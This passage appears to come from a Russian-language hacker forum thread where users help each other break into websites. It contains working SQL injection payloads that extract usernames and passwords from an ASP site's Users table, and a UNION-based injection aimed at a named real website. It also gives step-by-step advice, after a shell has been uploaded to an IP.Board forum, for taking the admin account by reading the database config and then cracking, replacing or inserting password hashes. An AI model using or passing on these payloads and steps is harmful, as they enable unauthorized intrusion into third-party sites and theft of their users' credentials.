Ваши вопросы по уязвимостям.

что, UPDATE никак не получится корректно поставить в запрос? А где "выше написано"?

 

Не в этом дело, в mysql через инъекцию изменять информацию в БД нельзя

 

Code:

.asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)%2B%27%3A%27%2Bcast(UserPassword+as+nvarchar)+from+Users)-

получаю

Что не так?

 

не получится ибо в подзапросах тока select и после union тоже тока select

если инъекция в update, то мона, но это зависит от конкретных условий. Если всё удачно, то мона и файлы читать, и выводить всё чё те надо.

 

.

Code:

asp?id=1+or+1=(SELECT+TOP+1+cast(UserLogin+as+nvarchar)+':'+cast(UserPassword+as+nvarchar)+from+Users)--

непонял я для чего ты cast использовал, мож там кавычки %27 фильтруются, да и вобще, нах cast то надо?
если захотел как суперхеккер сделать то можно весь подзапрос в каст взять, но думаю это не обязательно в твоем случае

 

Я делал как дядя Cash прописал в своей статье.... Покажи тогда пример запроса.

 

народ, я залил шел на IP.Board 2.2.2 © 2007 IPS, Inc. как теперь можно узнать пароль от админки??если можно и несложо обясните поподробние плиз

 

смотришь когфиг, там пасс, юзер и адрес от БД.
Заходишь в эту бд. Смотришь таблтцу с юзверями
Ищешь админа - брутишь хэш.
Меньше мороки - просто меняешь хэш
А лучше - вставить новую запись

 

ищи конфиг форума, там будет логин и пасс от СУБД, конектишься с этим пасом к базе и ищешь таблицу с юзерами

 

Code:

asp?id=1+or+1=(SELECT+TOP+1+UserLogin%2bCHAR(58)%2bUserPassword+from+Users)--

ну как то так

 

http://www.pp-pss.ru/main.php?ID=-1
помогите пожалуйста со скулем перебрал до 41 поля
http://www.pp-pss.ru/main.php?ID=-1/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
замучился может по другому как то надо

 

Мимо, проверяй пм.

 

Он же не ругается да different column а тупо выводит твой запрос. Эдак до потери пульса можно подбирать =) Смотри что там фильтруется и меняй запрос.

 

http://www.pp-pss.ru/main.php?ID=

1 колонка. без вывода. если мускул выше 4.0.* то возможен посимвольный перебор//

но тут 4.0.*. .поэтому он невозможен)

 

Если в ссылке на Личное письмо в IPB 1.3 подставить в конце ' , то вместо

Напишет вот что :

.Просто пустой текст.Что это может быть?
Также если по той же самой ссылке поставить '; -- то выдаст пустой текст ошибки.

 

ИМХО: ничего!
инъекта там нет

 

[aywo]
А там вообще чего есть?

 

2YaNeLam что ты имеешь ввиду?

 

ну там вообще на Ipb 1.3 патченом есть Sql?

 

тебе сюда _https://forum.antichat.ru/thread15678.html